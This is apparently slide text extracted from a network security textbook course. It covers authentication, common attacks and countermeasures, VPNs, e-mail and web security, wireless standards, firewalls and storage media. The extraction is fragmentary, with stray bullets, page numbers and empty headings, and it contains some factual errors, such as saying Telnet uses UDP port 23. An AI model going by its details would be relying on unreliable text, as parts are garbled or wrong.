C
Chapter 1
Learning Objectives
Understand network security Understand security threat trends and their ramifications Understand the goals of network security Determine the factors involved in a secure network strategy
Process by which digital information assets are protected Maintain integrity Protect confidentiality Assure availability
Goals
o o o
Security Threats
Identity theft Privacy concerns Wireless access
Assurance that data is not altered or destroyed in an unauthorized manner Protection of data from unauthorized disclosure to a third party Continuous operation of computing systems
Confidentiality
o
Availability
o
Technology Weaknesses
TCP/IP Operating systems Network equipment
Configuration Weaknesses
Unsecured accounts System accounts with easily guessed passwords Misconfigured Internet services Unsecured default settings Misconfigured network equipment Trojan horse programs Vandals Viruses
Policy Weaknesses
Lack of a written security policy Politics High turnover Concise access controls not applied Software and hardware installation and changes do not follow policy Proper security Nonexistent disaster recovery plan
Human Error
Accident Ignorance Workload Dishonesty Impersonation Disgruntled employees Snoops Denial-of-service attacks
continued
Prevent unauthorized access to or from private network Create protective layer between network and outside world Replicate network at point of entry in order to receive and transmit authorized data Have built-in filters Log attempted intrusions and create reports
continued
Ensures that only legitimate traffic is allowed into or out of the network
Passwords PINs Smartcards
continued
Document changes to all areas of IT infrastructure Ensures messages cannot be intercepted or read by anyone other than the intended person(s)
Encryption
continued
Provides 24/7 network surveillance Analyzes packet data streams within the network Searches for unauthorized activity
Chapter Summary
Understanding network security Security threats Security ramifications Goals of network security Creating a secure network strategy
10
Authentication
Chapter 2
Learning Objectives
Create strong passwords and store them securely Understand the Kerberos authentication process Understand how CHAP works Understand what mutual authentication is and why it is necessary Understand how digital certificates are created and why they are used
continued
Learning Objectives
Understand what tokens are and how they function Understand biometric authentication processes and their strengths and weaknesses Understand the benefits of multifactor authentication
Authentication
Positive identification of person/system seeking access to secured information/services
o o
Authorization
Predetermined level of access to resources
Accounting
Logging use of each asset
Authentication Techniques
Usernames and passwords Kerberos Challenge Handshake Authentication Protocol (CHAP) Mutual authentication Digital certificates Tokens Biometrics Multifactor authentication
Unique alphanumeric identifier used to identify an individual when logging onto a computer/network Secret combination of keystrokes that, when combined with a username, authenticates a user to a computer/network
Password
o
First letters of each word of a simple phrase; add a number and punctuation
Asb4M?
Use a different password for each group Cycle more complex passwords down the groups, from most sensitive to least
Storing Passwords
Written
o o o o
Keep in a place you are not likely to lose it Use small type Develop a personal code to apply to the list Use a specifically designed application (encrypts data)
Electronic
Kerberos
Provides secure and convenient way to access data and services through:
o o o o o o o
Session keys Tickets Authenticators Authentication servers Ticket-granting tickets Ticket-granting servers Cross-realm authentication
Secret key used during logon session between client and a service Set of electronic information used to authenticate identity of a principal to a service Device (eg, PPP network server) that requires authentication from a peer and specifies authentication protocol used in the configure request during link establishment phase
Ticket
o
Authenticator
o
continued
Data structure that acts as an authenticating proxy to principals master key for set period of time Server that grants ticket-granting tickets to a principal
Allows principal to authenticate itself to gain access to services in a distant part of a Kerberos system
Cross-Realm Authentication
10
11
Mutual Authentication
Process by which each party in an electronic communication verifies the identity of the other party
12
Digital Certificates
Electronic means of verifying identity of an individual/organization Digital signature
o
Piece of data that claims that a specific, named individual wrote or agreed to the contents of an electronic document to which the signature is attached
Converts plain text message into secret message Converts secret message into plain text message Uses only one key Uses a key pair (private key and public key)
continued
13
Trusted, third-party entity that verifies the actual identity of an organization/individual before providing a digital certificate Practice of using a trusted, third-party entity to verify the authenticity of a party who sends a message
Nonrepudiation
o
14
Security Tokens
Authentication devices assigned to specific user Small, credit card-sized physical devices Incorporate two-factor authentication methods Utilize base keys that are much stronger than short, simple passwords a person can remember
15
Act as a storage device for the base key Do not emit, or otherwise share, base tokens
Active
Actively create another form of a base key or encrypted form of a base key that is not subject to attack by sniffing and replay o Can provide variable outputs in various circumstances
One-Time Passwords
Used only once for limited period of time; then is no longer valid Uses shared keys and challenge-andresponse systems, which do not require that the secret be transmitted or revealed Strategies for generating one-time passwords
o o
16
Biometrics
Biometric authentication
Uses measurements of physical or behavioral characteristics of an individual o Generally considered most accurate of all authentication methods o Traditionally used in highly secure areas o Expensive
o
17
Occurrence of an unauthorized person being authenticated by a biometric authentication process Occurrence of an authorized person not being authenticated by a biometric authentication process when they are who they claim to be
False negative
o
Fingerprints Hand geometry Retinal scanning Iris scanning Facial scanning Handwritten signatures Voice
Behavioral characteristics
18
Fingerprint Biometrics
19
Retinal Scanning
Iris Scanning
20
Signature Verification
21
Multifactor Authentication
Identity of individual is verified using at least two of the three factors of authentication
o o o
Something you know (eg, password) Something you have (eg, smart card) Something about you (eg, biometrics)
Chapter Summary
Authentication techniques
o o o o o o o o
Usernames and passwords Kerberos CHAP Mutual authentication Digital certificates Tokens Biometrics Multifactor authentication
22
Learning Objectives
Explain denial-of-service (DoS) attacks Explain and discuss ping-of-death attacks Identify major components used in a DDoS attack and how they are installed Understand major types of spoofing attacks Discuss man-in-the-middle attacks, replay attacks, and TCP session hijacking
continued
Learning Objectives
Detail three types of social-engineering attacks and explain why they can be incredibly damaging List major types of attacks used against encrypted data List major types of malicious software and identify a countermeasure for each one
Denial-of-Service Attacks
Any malicious act that causes a system to be unusable by its real user(s) Take numerous forms Are very common Can be very costly Major types
o o
SYN Flood
Exploits the TCP three-way handshake Inhibits servers ability to accept new TCP connections
Smurf
Non-OS specific attack that uses the network to amplify its effect on the victim Floods a host with ICMP Saturates Internet connection with bogus traffic and delays/prevents legitimate traffic from reaching its destination
Ping of Death
DDoS Countermeasures
Security patches from software vendors Antivirus software Firewalls Ingress (inbound) and egress (outbound) filtering
continued
10
Spoofing
Act of falsely identifying a packets IP address, MAC address, etc Four primary types
o o o o
11
IP Address Spoofing
Used to exploit trust relationships between two hosts Involves creating an IP address with a forged source address
12
ARP Poisoning
Used in man-in-the-middle and session hijacking attacks; attacker takes over victims IP address by corrupting ARP caches of directly connected machines Attack tools
o o o
Web Spoofing
Convinces victim that he or she is visiting a real and legitimate site Considered both a man-in-the-middle attack and a denial-of-service attack
13
Web Spoofing
DNS Spoofing
Aggressor poses as the victims legitimate DNS server Can direct users to a compromised server Can redirect corporate e-mail through a hackers server where it can be copied or modified before sending mail to final destination
14
Disable source routing on all internal routers Filter out packets entering local network from the Internet that have a source address of the local network Use network switches that have MAC binding features
ARP poisoning
o
continued
Educate users Thoroughly secure DNS servers Deploy anti-IP address spoofing measures
DNS spoofing
15
Man-in-the-Middle Attacks
16
Man-in-the-Middle Applications
Web spoofing TCP session hijacking Information theft Other attacks (denial-of-service attacks, corruption of transmitted data, traffic analysis to gain information about victims network)
Man-in-the-Middle Methods
ARP poisoning ICMP redirects DNS poisoning
17
Replay Attacks
Attempts to circumvent authentication mechanisms by:
Recording authentication messages from a legitimate user o Reissuing those messages in order to impersonate the user and gain access to systems
o
Replay Attack
18
Hunt (Linux)
19
Social Engineering
Class of attacks that uses trickery on people instead of computers Goals
o o o o o
Fraud Network intrusion Industrial espionage Identity theft Desire to disrupt the system or network
20
Dumpster Diving
Online Attacks
Use chat and e-mails venues to exploit trust relationships
21
22
Weak Keys
Secret keys used in encryption that exhibit regularities in encryption, or even a poor level of encryption
Mathematical Attack
Attempts to decrypt encrypted data using mathematics to find weaknesses in the encryption algorithm Categories of cryptanalysis
o o o
23
Birthday Attack
Class of brute-force mathematical attacks that exploits mathematical weaknesses of hash algorithms and one-way hash functions
Password Guessing
Tricks authentication mechanisms by determining a users password using techniques such as brute force or dictionary attacks
24
Brute Force
Method of breaking passwords that involves computation of every possible combination of characters for a password of a given character length
25
Dictionary
Method of breaking passwords by using a predetermined list of words as input to the password hash Only works against poorly chosen passwords
Software Exploitation
Utilizes software vulnerabilities to gain access and compromise systems Example
o o
Buffer overflow attach Stay appraised of latest security patches provided by software vendors
26
Malicious Software
Viruses
Self-replicating programs that spread by infecting other programs Damaging and costly
27
Virus Databases
28
Desktop antivirus programs Virus filters for e-mail servers Network appliances that detect and remove viruses
29
Backdoor
Remote access program surreptitiously installed on user computers that allows attacker to control behavior of victims computer Also known as remote access Trojans Examples
o o o o
Back Orifice 2000 (BO2K) NetBus Up-to-date antivirus software Intrusion detection systems (IDS)
30
Trojan Horses
Class of malware that uses social engineering to spread Types of methods
Sending copies of itself to all recipients in users address book o Deleting or modifying files o Installing backdoor/remote control programs
o
31
Logic Bombs
Set of computer instructions that lie dormant until triggered by a specific event Once triggered, the logic bomb performs a malicious task Almost impossible to detect until after triggered Often the work of former employees For example: macro virus
o
Worms
Self-contained program that uses security flaws such as buffer overflows to remotely compromise a victim and replicate itself to that system Do not infect other executable programs Account for 80% of all malicious activity on Internet Examples: Code Red, Code Red II, Nimda
32
Chapter Summary
Mechanisms, countermeasures, and best practices for:
o o o o o
Malicious software Denial-of-service attacks Software exploits Social engineering Attacks on encrypted data
33
Remote Access
Chapter 4
Learning Objectives
Understand implications of IEEE 802.1x and how it is used Understand VPN technology and its uses for securing remote access to networks Understand how RADIUS authentication works Understand how TACACS+ operates Understand how PPTP works and when it is used
continued
Learning Objectives
Understand how L2TP works and when it is used Understand how SSH operates and when it is used Understand how IPSec works and when it is used Understand the vulnerabilities associated with telecommuting
IEEE 802.1x
Internet standard created to perform authentication services for remote access to a central LAN Uses SNMP to define levels of access control and behavior of ports providing remote access to LAN environment Uses EAP over LAN (EAPOL) encapsulation method
Telnet
Standard terminal emulation protocol within TCP/IP protocol suite defined by RFC 854 Utilizes UDP port 23 to communicate Allows users to log on to remote networks and use resources as if locally connected
Controlling Telnet
Assign enable password as initial line of defense Use access lists that define who has access to what resources based on specific IP addresses Use a firewall that can filter traffic based on ports, IP addresses, etc
VPN Diagram
Tunneling
Enables one network to send its data via another networks connections Encapsulates a network protocol within packets carried by the second network
Tunneling
VPN Options
Install/configure client computer to initiate necessary security communications Outsource VPN to a service provider
o
VPN Drawbacks
Not completely fault tolerant Diverse implementation choices
o
Software solutions
Tend to have trouble processing all the simultaneous connections on a large network
Hardware solutions
Require higher costs
Authenticates users through a series of communications between client and server using UDP
10
11
PPTP Tasks
Queries status of communications servers Provides in-band management Allocates channels and places outgoing calls Notifies Windows NT Server of incoming calls Transmits and receives user data with bidirectional flow control Notifies Windows NT Server of disconnected calls Assures data integrity; coordinates packet flow
continued
12
Solves splitting problems by projecting a PPP session to a location other than the point at which it is physically received
Log on to another computer over a network Execute command in a remote machine Move files from one machine to another
13
IP Security Protocol
Set of protocols developed by the IETF to support secure exchange of packets at IP layer Deployed widely to implement VPNs Works with existing and future IP standards Transparent to users Promises painless scalability Handles encryption at packet level using Encapsulating Security Payload (ESP)
14
15
Telecommuting Vulnerabilities
Telecommuting Vulnerabilities
16
Telecommuting Vulnerabilities
Telecommuting Vulnerabilities
17
Telecommuting Vulnerabilities
Remote Solutions
Microsoft Terminal Server Citrix Metaframe Virtual Network Computing
18
Chapter Summary
Paramount need for remote access security Use of technologies to mitigate some of the risk of compromising the information security of a home network Importance of keeping pace with technology changes
19
E-mail
Chapter 5
Learning Objectives
Understand the need for secure e-mail Outline benefits of PGP and S/MIME Understand e-mail vulnerabilities and how to safeguard against them Explain the dangers posed by e-mail hoaxes and spam, as well as actions that can be taken to counteract them
Uses cryptography to secure messages transmitted across insecure networks E-mail can be transmitted over unsecured links E-mail can be stored in encrypted form Encryption Digital signatures Digital certificates
Encryption
Passes data and a value (key) through a series of mathematical formulas that make the data unusable and unreadable To recover information, reverse the process using the appropriate key Two main types
o o
Encryption
Hash Functions
Produce a message digest that cannot be reversed to produce the original Two major hash functions in use
o o
Digital Signatures
Electronic identification of a person or thing created by using a public key algorithm Verify (to a recipient) the integrity of data and identity of the sender Provide same features as encryption, except confidentiality Created by using hash functions
Digital Certificates
Electronic document attached to a public key by a trusted third party Provide proof that the public key belongs to a legitimate owner and has not been compromised Consist of:
o o o
Conventional encryption
o o
Fast, but results in key distribution problem Private key and public key
Background on PGP
Current de facto standard Written by Phil Zimmerman 1991 Supports major conventional encryption methods
o o o o
CAST International Data Encryption Algorithm (IDEA) Triple Data Encryption Standard (3DES) Twofish
PGP Certificates
More flexible and extensible than X.509 certificates A single certificate can contain multiple signatures
10
S/MIME
Specification designed to add security to e-mail messages in MIME format Security services
o o
11
RSA RC2 SHA-1 ANSI X.509 certificates Transport over the Internet
S/MIME Background
Four primary standards
o o o o
RFC 2630
Cryptographic Message Syntax
RFC 2633
S/MIME version 3 Message Specification
RFC 2632
S/MIME version 3 Certificate Handling
RFC 2634
Enhanced Security Services for S/MIME
12
PKCS (Public Key Cryptography Standards) S/MIME prevents exposure of signature information to eavesdropper
o
Applies digital signature first; then encloses signature and original message in an encrypted digital envelope
X.509 Certificates
Rather than define its own certificate type (like PGP), S/MIME relies on X.509 Issued by a certificate authority (CA)
13
14
EIGamal
continued
MIME Choice of Multipart/signed encapsulation for multipart/signed orwith ASCII armor signed data CMS format MIME Application/ encapsulation for PKCS#7-MIME encrypted data Trust model Hierarchical Multipart/ encrypted Web of trust
continued
15
Marketplace Growing quickly adoption Marketplace Microsoft, RSA, advocates VeriSign Ease of use Configuration not intuitive; must obtain and install certificates; general use straight-forward
16
E-mail Vulnerabilities
continued
17
E-mail Vulnerabilities
Spam
Act of flooding the Internet with many copies of the same message in an attempt to force the message on people who would not otherwise choose to receive it Unrequested junk mail
18
E-mail Spam
Targets individual users with direct mail messages Creates lists by:
o o o
Scanning Usenet postings Stealing Internet mailing lists Searching the Web for addresses
Appealing to be an authority to exploit trust Generating excitement about being involved Creating a sense of importance/belonging Playing on peoples gullibility/greed
19
20
21
Chapter Summary
PGP
o o o o
Current de facto e-mail encryption standard Basis of OpenPGP standard Emerging standard in e-mail encryption Uses X.509 certificates used by Microsoft and Netscape browser and e-mail client software
S/MIME
22
Web Security
Chapter 6
Learning Objectives
Understand SSL/TLS protocols and their implementation on the Internet Understand HTTPS protocol as it relates to SSL Explore common uses of instant messaging applications and identify vulnerabilities associated with those applications
continued
Learning Objectives
Understand the vulnerabilities of JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, SMTP relay, and how they are commonly exploited
SSL/TLS Protocol
Runs on top of the TCP and below higherlevel protocols Uses TCP/IP on behalf of higher-level protocols Allows SSL-enabled server to authenticate itself to SSL-enabled client Allows client to authenticate itself to server Allows both machines to establish an encrypted connection
SSL/TLS Protocol
Uses ciphers to enable encryption of data between two parties Uses digital certificates to enable authentication of the parties involved in a secure transaction
Digital Certificates
Components
o o o o
Certificate users name Entity for whom certificate is being issued Public key of the subject Time stamp
IM Security Issues
Cannot prevent transportation of files that contain viruses and Trojan horses Misconfigured file sharing can provide access to sensitive or confidential data Lack of encryption Could be utilized for transportation of copyrighted material; potential for substantial legal consequences Transferring files reveals network addresses of hosts; could be used for Denial-of-Service attack
IM Applications
Do not use well-known TCP ports for communication and file transfers; use registered ports Ports can be filtered to restrict certain functionalities or prevent usage altogether
JavaScript ActiveX Buffers Cookies Signed applets Common Gateway Interface (CGI) Simple Mail Transfer Protocol (SMTP) relay
JavaScript
Scripting language developed by Netscape to enable Web authors to design interactive sites Code is typically embedded into an HTML document and placed between the <head> and </head> tags Programs can perform tasks outside users control
ActiveX
Loosely defined set of technologies developed by Microsoft
o
Outgrowth of OLE (Object Linking and Embedding) and COM (Component Object Model)
Provides tools for linking desktop applications to WWW content Utilizes embedded Visual Basic code that can compromise integrity, availability,and confidentiality of a target system
Buffer
Temporary storage area, usually in RAM Acts as a holding area, enabling the CPU to manipulate data before transferring it to a device
10
Cookies
Messages given to Web browsers by Web servers
o o
Browser stores message in a text file Message is sent back to server each time browser requests a page from server
11
Vulnerabilities of Cookies
Contain tools that are easily exploited to provide information about users without consent
Attacker convinces user to follow malicious hyperlink to targeted server to obtain the cookie through error handling process on the server o User must be logged on during time of attack
o
Do not return unescaped data back to user Do not echo 404 file requests back to user
Java Applets
Internet applications (written in Java programming language) that can operate on most client hardware and software platforms Stored on Web servers from where they can be downloaded onto clients when first accessed With subsequent server access, the applet is already cached on the client and can be executed with no download delay
12
Signed Applets
Technique of adding a digital signature to an applet to prove that it came unaltered from a particular trusted source Can be given more privileges than ordinary applets Unsigned applets are subject to sandbox restrictions
Unsigned Applets
13
Sandbox Model
Prevent the applet from:
Performing required operations on local system resources o Connecting to any Web site except the site from which the applet was loaded o Accessing clients local printer o Accessing clients system clipboard and properties
o
Signed Applets
14
Executable program on the server (the script itself) HTML page that feeds input to the executable
15
CGI
Interactive nature leads to security loopholes
o
Allowing input from other systems to a program that runs on a local server exposes the system to potential security hazards
16
17
Loss of bandwidth Hijacked mail servers that may no longer be able to serve their legitimate purpose
Chapter Summary
Protocols commonly implemented for secure message transmissions
o o
Data encryption across the Internet through Secure Hyper Text Transfer Protocol in relation to SSL/TSL
continued
18
Chapter Summary
Instant Messaging
o o
19
Learning Objectives
Explain benefits offered by centralized enterprise directory services such as LDAP over traditional authentication systems Identify major vulnerabilities of the FTP method of exchanging data Describe S/FTP, the major alternative to using FTP, in order to better secure your network infrastructure Illustrate the threat posed to your network by unmonitored file shares
Directory Services
Network services that uniquely identify users and can be used to authenticate and authorize them to use network resources Allow users to look up username or resource information, just as DNS does
continued
LDAP
Provides additional features including authentication and authorization
o
Each person uses only one username and password regardless of client software and OS Versatile directory system that is standards based and platform independent
LDAP Operations
LDAP Framework
Directory Information Tree (DIT)
Data structure that actually contains directory information about network users and services o Hierarchical structure
o
LDAP Framework
DN example
cn=Jonathan Q Public o ou=Information Security Department o o=XYZ Corp. o c=United States
o
Authorization
Determines network resources the user may access o Determined by access control lists (ACLs)
o
Encryption
o
Active FTP
FTPs default connection FTP server creates data connection by opening a TCP session using source port of 20 and destination port greater than 1023 (contrary to TCPs normal operation)
Passive FTP
Not supported by all FTP implementations Client initiates data connection to the server with a source and destination port that are both random high ports
10
FTP Countermeasures
Do not allow anonymous access unless a clear business requirement exists Employ a state-of-the-art firewall Ensure that server has latest security patches and has been properly configured to limit user access Encrypt data before placing it on FTP server
continued
11
FTP Countermeasures
Encrypt FTP data flow using a VPN connection Switch to a secure alternative
Replacement for FTP that uses SSH version 2 as a secure framework for encrypting data transfers
12
13
File Sharing
Originally intended to share files on a LAN Easy to set up Uses Windows graphical interface Can be configured as peer-to-peer or as client/server shares
14
15
Chapter Summary
Key resources used to support mission-critical business applications
o o
Directory services
LDAP
16
Learning Objectives
Understand security issues related to wireless data transfer Understand the 802.11x standards Understand Wireless Application Protocol (WAP) and how it works Understand Wireless Transport Layer Security (WTLS) protocol and how it works
continued
Learning Objectives
Understand Wired Equivalent Privacy (WEP) and how it works Conduct a wireless site survey Understand instant messaging
802.11
IEEE group responsible for defining interface between wireless clients and their network access points in wireless LANs First standard finalized in 1997 defined three types of transmission at Physical layer
Diffused infrared - based on infrared transmissions Direct sequence spread spectrum (DSSS) - radiobased o Frequency hopping spread spectrum (FHSS) radio-based
o o
continued
802.11
Established WEP as optional security protocol Specified use of 2.4 GHz industrial, scientific, and medical (ISM) radio band Mandated 1 Mbps data transfer rate and optional 2 Mbps data transfer rate Most prominent working groups: 802.11b, 802.11a, 802.11i, and 802.11g
802.11a
High-Speed Physical Layer in the 5 GHz Band Sets specifications for wireless data transmission of up to 54 Mbps in the 5 GHz band Uses an orthogonal frequency division multiplexing encoding scheme rather than FHSS or DSSS Approved in 1999
802.11b
Higher-Speed Layer Extension in the 2.4 GHz Band Establishes specifications for data transmission that provides 11 Mbps transmission (with fallback to 5.5, 2, and 1 Mbps) at 2.4 GHz band Sometimes referred to as Wi-Fi when associated with WECA certified devices Uses only DSSS Approved in 1999
802.11c
Worked to establish MAC bridging functionality for 802.11 to operate in other countries Folded into 802.1D standard for MAC bridging
802.11d
Responsible for determining requirements necessary for 802.11 to operate in other countries Continuing
802.11e
Responsible for creating a standard that will add multimedia and quality of service (QoS) capabilities to wireless MAC layer and therefore guarantee specified data transmission rates and error percentages Proposal in draft form
802.11f
Responsible for creating a standard that will allow for better roaming between multivendor access points and distribution systems Ongoing
802.11g
Responsible for providing raw data throughput over wireless networks at a throughput rate of 22 Mbps or more Draft created in January 2002; final approval expected in late 2002 or early 2003
802.11h
Responsible for providing a way to allow for European implementation requests regarding the 5 GHz band Requirements
Limits PC card from emitting more radio signal than needed o Allows devices to listen to radio wave activity before picking a channel on which to broadcast
o
802.11i
Responsible for fixing security flaws in WEP and 802.1x Hopes to eliminate WEP altogether and replace it with Temporal Key Integrity Protocol (TKIP), which would require replacement of keys within a certain amount of time Ongoing; not yet approved
802.11j
Worked to create a global standard in the 5 GHz band by making high-performance LAN (HiperLAN) and 802.11a interoperable Disbanded after efforts in this area were mostly successful
WAP-Enabled Devices
WAP-Enabled Devices
10
11
12
13
Class 1
Anonymous; does not allow either the client or the gateway to authenticate each other
o o
Class 2
Only allows the client to authenticate the gateway
Class 3
Allows both the client and the gateway to authenticate each other
14
15
Connected to the wired LAN Act as radio broadcast stations that transmit data to clients equipped with wireless network interface cards (NICs)
16
APs
NICs
17
continued
18
WEPs Weaknesses
Problems related to the initialization vector (IV) that it uses to encrypt data and ensure its integrity
o o
19
20
Definition of IM
Uses a real-time communication model Allows users to keep track of online status and availability of other users who are also using IM applications Can be used on both wired and wireless devices Easy and fast
continued
Definition of IM
Operates in two models:
o o
Peer-to-peer model
May cause client to expose sensitive information
Peer-to-network model
Risk of network outage and DoS attacks making IM communication unavailable
21
Problems Facing IM
Lack of default encryption enables packet sniffing Social engineering overcomes even encryption
22
Blocking IM
Install a firewall to block ports that IM products use; IM will be unavailable to all employees Limited blocking not currently possible
23
Chapter Summary
Efforts of IEEE, specifically 802.11x standards, to standardize wireless security Security issues related to dominant wireless protocols
o
WAP
Connects mobile telephones, PDAs, pocket computers, and other mobile devices to the Internet
WEP
Used in WLANs
continued
24
Chapter Summary
WTLS protocol Conducting a site survey in advance of building a WLAN Security threats related to using (IM)
25
Devices
Chapter 9
Learning Objectives
Understand the purpose of a network firewall and the kinds of firewall technology available on the market Understand the role of routers, switches, and other networking hardware in security Determine when VPN or RAS technology works to provide a secure network connection
Firewalls
Hardware or software device that provides a means of securing a computer or network from unwanted intrusion
Dedicated physical device that protects network from intrusion o Software feature added to a router, switch, or other device that prevents traffic to or from part of a network
o
Web servers Mail servers FTP servers Databases Sport hackers Malicious hackers
Intruders
Enhances security by allowing the filter to distinguish on which side of firewall a connection was initiated; essential to blocking IP spoofing attaches
Routers
Network management device that sits between network segments and routes traffic from one network to another Allows networks to communicate with one another Allows Internet to function Act as digital traffic cop (with addition of packet filtering)
10
Demilitarized Zone
Area set aside for servers that are publicly accessible or have lower security requirements Sits between the Internet and internal networks line of defense
Stateful device fully protects other internal systems o Packet filter allows external traffic only to services provided by DMZ servers
o
Allows a company to host its own Internet services without sacrificing unauthorized access to its private network
11
Bastion Hosts
Computers that reside in a DMZ and that host Web, mail, DNS, and/or FTP services Gateway between an inside network and an outside network Defends against attacks aimed at the inside network; used as a security measure Unnecessary programs, services, and protocols are removed; unnecessary network ports are disabled Do not share authentication services with trusted hosts within the network
Application Gateways
Also known as proxy servers Monitor specific applications (FTP, HTTP, Telnet) Allow packets accessing those services to go to only those computers that are allowed Good backup to packet filtering
12
Application Gateways
Security advantages
o o o o
Information hiding Robust authentication and logging Simpler filtering rules Two steps are required to connect inbound or outbound traffic; can increase processor overhead
Disadvantage
13
Where TCP and UDP ports that control communication sessions operate Routes IP packets Delivers data frames across LANs
Layer 3
o o
Layer 2
14
Switches
Provide same function as bridges (divide collision domains), but employ applicationspecific integrated circuits (ASICs) that are optimized for the task Reduce collision domain to two nodes (switch and host) Main benefit over hubs
o
15
Switches
Switch Security
ACLs Virtual Local Area Networks (VLANs)
16
Only authorized users can access the network Data cannot be intercepted Increases security from hackers Reduces possibility of broadcast storm
17
Securing a Switch
Isolate all management interfaces Manage switch by physical connection to a serial port or through secure shell (SSH) or other encrypted method Use separate switches or hubs for DMZs to physically isolate them from the network and prevent VLAN jumping
continued
Securing a Switch
Put switch behind dedicated firewall device Maintain the switch; install latest version of software and security patches Read product documentation Set strong passwords
18
Wireless
Almost anyone can eavesdrop on a network communication Encryption is the only secure method of communicating with wireless technology
19
Modems
Cable modem
Connected to a shared segment; party line Most have basic firewall capabilities to prevent files from being viewed or downloaded o Most implement the Data Over Cable Service Interface Specification (DOCSIS) for authentication and packet filtering
o o
20
Dynamic IP addresses
Provide enhanced security By changing IP addresses of client machines, DHCP server makes them moving targets for potential hackers o Assigned by the Dynamic Host Configuration Protocol (DHCP)
21
22
IP-Based PBX
23
24
Software (computer-based IDS) Dedicated hardware devices (network-based IDS) Anomaly-based detection Signature-based detection
Types of detection
25
Computer-based IDS
Software applications (agents) are installed on each protected computer
Make use of disk space, RAM, and CPU time to analyze OS, applications, system audit trails o Compare these to a list of specific rules o Report discrepancies
o
Can be self-contained or remotely managed Easy to upgrade software, but do not scale well
Network-based IDS
Monitors activity on a specific network segment Dedicated platforms with two components
o o
Sensor
Passively analyzes network traffic
Management system
Displays alarm information from the sensor
26
Anomaly-based Detection
Builds statistical profiles of user activity and then reacts to any activity that falls outside these profiles Often leads to large number of false positives
Users do not access computers/network in static, predictable ways o Cost of building a sensor that could hold enough memory to contain the entire profile and time to process the profiles is prohibitively large
o
27
Signature-based Detection
Similar to antivirus program in its method of detecting potential attacks Vendors produce a list of signatures used by the IDS to compare against activity on the network or host When a match is found, the IDS take some action (eg, logging the event) Can produce false positives; normal network activity may be construed as malicious
28
Norton Firewall ZoneAlarm Black Ice Defender Tiny Softwares Personal Firewall
29
30
Mobile Devices
Can open security holes for any computer with which these devices communicate
Chapter Summary
Virtual isolation of a computer or network by implementing a firewall through software and hardware techniques:
o o o o
Routers Switches Modems Various software packages designed to run on servers, workstations, and PDAs
continued
31
Chapter Summary
Virtual private networks (VPNs) Private branch exchanges (PBX) Remote Access Services (RAS)
32
Learning Objectives
Identify and discuss the various types of transmission media Explain how to physically protect transmission media adequately Identify and discuss the various types of storage media Know how to lessen the risk of catastrophic loss of information
continued
Learning Objectives
Understand the various ways to encrypt data Properly maintain or destroy stored data
Transmission Media
Coaxial cable Twisted pair copper cable
o o
Shielded Unshielded
Coaxial Cable
Hollow outer cylinder surrounds a single inner wire conductor
Coaxial Cable
More expensive than traditional telephone wiring Less prone to interference Typically carries larger amounts of data Easily spliced; allows unauthorized users access to the network Two types (not interchangeable)
o o
50-ohm 75-ohm
Simple to implement and widely available Low cost alternative that provides relatively high rates of data transmission Can only carry data and voice Limited in distance it can transmit signals
Disadvantages
o o
10Base2 (ThinNet)
Uses a thin coaxial cable in an Ethernet environment Capable of covering up to 180 meters Allows daisy chaining Not highly susceptible to noise interference Transmits at 10 Mbps Can support up to 30 nodes per segment
10Base5 (ThickNet)
Primarily used as a backbone in an office LAN environment Often connects wiring closets Can transmit data at speeds up to 10 Mbps Covers distances up to 500 meters Can accommodate up to 100 nodes per segment Rigid and difficult to work with
Allows for data, voice, and video capabilities Can cover greater distances and offers more bandwidth Requires hardware to connect via modems More difficult to maintain
Disadvantages
o o
10
Twisted Pair
Connects to hardware using an RJ-45 connector
Fiber-Optic Cable
Glass core encased in plastic outer covering Smaller, lighter, more fragile and susceptible to damage than coaxial or twisted pair cable Carries light
11
Fiber-Optic Cable
Fiber-Optic Cable
Advantages
Capable of transmitting more data much further than other wiring types o Completely immune to effects of EMI o Nearly impossible to splice without detection
o
Disadvantages
o o
12
Fiber-optic cable
Very high bandwidth Difficult to implement EMI immunity Expensive Long distances Fragile High security Small size
Unguided Transmission
Uses various technologies (microwave, radio and infrared) to receive and transmit through the air Vulnerable to security breaches in which unauthorized users intercept data flow Difficult to secure; unguided connections cannot be physically contained easily
13
continued
14
Storage Media
Provides a way to hold data at rest Hard disk drive
o o o o o
Electromagnet inside disk drive rearranges the iron oxide particles into a series of patterns that represent 0s and 1s
15
Floppy Disk
3.5 inch, high density 1.44 MB capacity Circular magnetic piece of plastic inside a rigid plastic case
16
Zip Disk
High-capacity floppy disk developed by Iomega Corporation 100 MB and 250 MB capacity Relatively inexpensive and durable Ideal for transporting larger multimedia files Can be used for backup
17
Compact Disc
Data is recorded by creating very small bumps in the aluminum layer on long tiny tracks Data is read by a laser beam, detected by an optoelectronic sensor, and the pattern translated into bits and sent to the computer
CD-ROMs
Most common type of CD Material can be written or recorded to the disc only once Hold prerecorded materials to be used on a computer (eg, software, graphic images, short video clips, audio)
18
Write once, read many (WORM) type of media Next step: compact disc-rewritable (CD-RW)
Tracks are thinner and closer to each other Readable on both sides of the disc
Made out of plastic with a layer of gold, covered by a thin layer of clear polymer Used to store full-length feature films
19
Used primarily in digital cameras, digital video cameras, digital audio recorders
20
CompactFlash Card
Stores up to 1 GB High data transfer rate Resistant to extreme weather conditions
SmartMedia Card
Used in digital still cameras, MP3 recorders, newer printing devices Stores up to 64 MB of data Less expensive than CompactFlash cards High data transfer rate Resistant to extreme weather conditions
21
Memory Stick
Holds up to 128 MB of data Commonly used with digital still cameras, digital music players (MP3), digital voice recorders High data transfer rate Resistance to extreme temperatures High storage capacity
22
Encryption
Implement a thorough encryption policy to guarantee that sensitive information does not fall into the wrong hands Educate the entire organization about the importance of safeguarding sensitive data
23
Storing Media
Have a policy that tracks content and location of each disk Mark each medium using a standardized naming scheme Store copies in a secure location
Destruction of Media
Physically destroy the media Erase the data
24
Chapter Summary
Transmission media Storage media Impact of different forms of transmission media and storage media on information security
25
Learning Objectives
Explain network perimeters importance to an organizations security policies Identify place and role of the demilitarized zone in the network Explain how network address translation is used to help secure networks Spell out the role of tunneling in network security Describe security features of virtual local area networks
continued
Three-tiered Architecture
Outermost perimeter Internal perimeters Innermost perimeter
Outermost Perimeter
Router used to separate network from ISPs network Identifies separation point between assets you control and those you do not Most insecure area of a network infrastructure Normally reserved for routers, firewalls, public Internet servers (HTTP, FTP, Gopher) Not for sensitive company information that is for internal use only
Internal Perimeters
Represent additional boundaries where other security measures are in place
Network Classifications
Trusted Semi-trusted Untrusted
Trusted Networks
Inside network security perimeter The networks you are trying to protect
Semi-Trusted Networks
